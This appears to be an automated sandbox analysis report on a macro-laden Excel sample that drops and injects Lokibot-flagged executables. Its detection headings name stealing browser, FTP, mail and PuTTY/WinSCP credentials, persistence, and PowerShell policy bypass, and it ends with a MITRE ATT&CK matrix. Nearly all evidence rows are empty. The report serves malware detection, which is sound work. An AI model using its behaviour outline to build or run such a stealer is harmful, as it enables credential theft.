Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Source: | Network traffic detected: | ||
Source: | Network traffic detected: |
System Summary: |
---|
Malicious sample detected (through community Yara rule) | Show sources |
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: |
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) | Show sources |
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: |
Found Excel 4.0 Macro with suspicious formulas | Show sources |
Source: | Initial sample: |
Found abnormal large hidden Excel 4.0 Macro sheet | Show sources |
Source: | Initial sample: |
Found obfuscated Excel 4.0 Macro | Show sources |
Source: | Initial sample: |
Powershell drops PE file | Show sources |
Source: | File created: | Jump to dropped file |
Source: | Memory allocated: | ||
Source: | Memory allocated: | ||
Source: | Memory allocated: | ||
Source: | Memory allocated: | ||
Source: | Memory allocated: | ||
Source: | Memory allocated: | ||
Source: | Memory allocated: | ||
Source: | Memory allocated: | ||
Source: | Memory allocated: | ||
Source: | Memory allocated: | ||
Source: | Memory allocated: | ||
Source: | Memory allocated: | ||
Source: | Memory allocated: | ||
Source: | Memory allocated: |
Source: | Code function: |
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: |
Source: | OLE indicator, VBA macros: |
Source: | Dropped File: |
Source: | Code function: | ||
Source: | Code function: |
Source: | Registry key queried: |
Source: | Process created: |
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: |
Source: | Cryptographic APIs: | ||
Source: | Cryptographic APIs: | ||
Source: | Cryptographic APIs: | ||
Source: | Cryptographic APIs: | ||
Source: | Cryptographic APIs: | ||
Source: | Cryptographic APIs: | ||
Source: | Cryptographic APIs: | ||
Source: | Cryptographic APIs: | ||
Source: | Cryptographic APIs: | ||
Source: | Cryptographic APIs: | ||
Source: | Cryptographic APIs: |
Source: | Binary or memory string: |
Source: | Classification label: |
Source: | Code function: |
Source: | Code function: |
Source: | File created: | Jump to behavior |
Source: | Mutant created: | ||
Source: | Mutant created: |
Source: | File created: | Jump to behavior |
Source: | OLE indicator, Workbook stream: |
Source: | Console Write: |
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: |
Source: | File read: | Jump to behavior |
Source: | Key opened: |
Source: | File read: | Jump to behavior |
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: |
Source: | Key value queried: |
Source: | Window detected: |
Source: | File opened: |
Source: | Key opened: |
Source: | File opened: |
Source: | Binary string: | ||
Source: | Binary string: |
Data Obfuscation: |
---|
Obfuscated command line found | Show sources |
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: |
Yara detected aPLib compressed binary | Show sources |
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: |
Persistence and Installation Behavior: |
---|
Drops PE files to the document folder of the user | Show sources |
Source: | File created: | Jump to dropped file |
Source: | File created: | Jump to dropped file | ||
Source: | File created: | Jump to dropped file | ||
Source: | File created: | Jump to dropped file |
Source: | File created: | Jump to dropped file |
Boot Survival: |
---|
Drops PE files to the user root directory | Show sources |
Source: | File created: | Jump to dropped file |
Source: | Registry value created or modified: | Jump to behavior | ||
Source: | Registry value created or modified: | Jump to behavior |
Hooking and other Techniques for Hiding and Protection: |
---|
Hides that the sample has been downloaded from the Internet (zone.identifier) | Show sources |
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: |
Source: | Registry key monitored for changes: |
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: |
Source: | Thread delayed: | ||
Source: | Thread delayed: | ||
Source: | Thread delayed: | ||
Source: | Thread delayed: | ||
Source: | Thread delayed: | ||
Source: | Thread delayed: | ||
Source: | Thread delayed: | ||
Source: | Thread delayed: | ||
Source: | Thread delayed: |
Source: | Thread sleep time: | ||
Source: | Thread sleep time: | ||
Source: | Thread sleep time: | ||
Source: | Thread sleep time: | ||
Source: | Thread sleep time: | ||
Source: | Thread sleep time: | ||
Source: | Thread sleep count: | ||
Source: | Thread sleep time: | ||
Source: | Thread sleep time: | ||
Source: | Thread sleep time: | ||
Source: | Thread sleep time: | ||
Source: | Thread sleep count: | ||
Source: | Thread sleep time: | ||
Source: | Thread sleep time: | ||
Source: | Thread sleep time: | ||
Source: | Thread sleep time: | ||
Source: | Thread sleep time: | ||
Source: | Thread sleep time: | ||
Source: | Thread sleep count: | ||
Source: | Thread sleep time: |
Source: | Last function: |
Source: | Code function: |
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: |
Source: | Binary or memory string: |
Source: | Process information queried: |
Source: | Code function: |
Source: | Code function: |
Source: | Process token adjusted: | ||
Source: | Process token adjusted: | ||
Source: | Process token adjusted: | ||
Source: | Process token adjusted: | ||
Source: | Process token adjusted: | ||
Source: | Process token adjusted: | ||
Source: | Process token adjusted: | ||
Source: | Process token adjusted: |
Source: | Memory allocated: |
HIPS / PFW / Operating System Protection Evasion: |
---|
Allocates memory in foreign processes | Show sources |
Source: | Memory allocated: | ||
Source: | Memory allocated: |
Bypasses PowerShell execution policy | Show sources |
Source: | Process created: |
Injects a PE file into a foreign processes | Show sources |
Source: | Memory written: | ||
Source: | Memory written: |
Writes to foreign memory regions | Show sources |
Source: | Memory written: | ||
Source: | Memory written: | ||
Source: | Memory written: | ||
Source: | Memory written: | ||
Source: | Memory written: | ||
Source: | Memory written: | ||
Source: | Memory written: | ||
Source: | Memory written: | ||
Source: | Memory written: | ||
Source: | Memory written: | ||
Source: | Memory written: | ||
Source: | Memory written: |
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: |
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: |
Source: | Code function: |
Source: | Key value queried: |
Stealing of Sensitive Information: |
---|
Yara detected Lokibot | Show sources |
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) | Show sources |
Source: | Key opened: | ||
Source: | Key opened: |
Tries to harvest and steal browser information (history, passwords, etc) | Show sources |
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: |
Tries to harvest and steal ftp login credentials | Show sources |
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: |
Tries to steal Mail credentials (via file access) | Show sources |
Source: | Key opened: | ||
Source: | Key opened: |
Tries to steal Mail credentials (via file registry) | Show sources |
Source: | Code function: | ||
Source: | Code function: |
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Mitre Att&ck Matrix |
---|
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Valid Accounts1 | Scripting31 | Valid Accounts1 | Valid Accounts1 | Disable or Modify Tools11 | OS Credential Dumping2 | Account Discovery1 | Remote Services | Archive Collected Data11 | Exfiltration Over Other Network Medium | Ingress Tool Transfer2 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
Default Accounts | Exploitation for Client Execution13 | Registry Run Keys / Startup Folder1 | Access Token Manipulation11 | Deobfuscate/Decode Files or Information111 | Credentials in Registry2 | File and Directory Discovery3 | Remote Desktop Protocol | Man in the Browser1 | Exfiltration Over Bluetooth | Encrypted Channel12 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
Domain Accounts | Command and Scripting Interpreter11 | Logon Script (Windows) | Process Injection311 | Scripting31 | Security Account Manager | System Information Discovery13 | SMB/Windows Admin Shares | Data from Local System2 | Automated Exfiltration | Non-Application Layer Protocol3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
Local Accounts | PowerShell2 | Logon Script (Mac) | Registry Run Keys / Startup Folder1 | Obfuscated Files or Information3 | NTDS | Query Registry1 | Distributed Component Object Model | Email Collection1 | Scheduled Transfer | Application Layer Protocol14 | SIM Card Swap | Carrier Billing Fraud | |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Masquerading111 | LSA Secrets | Security Software Discovery11 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings | |
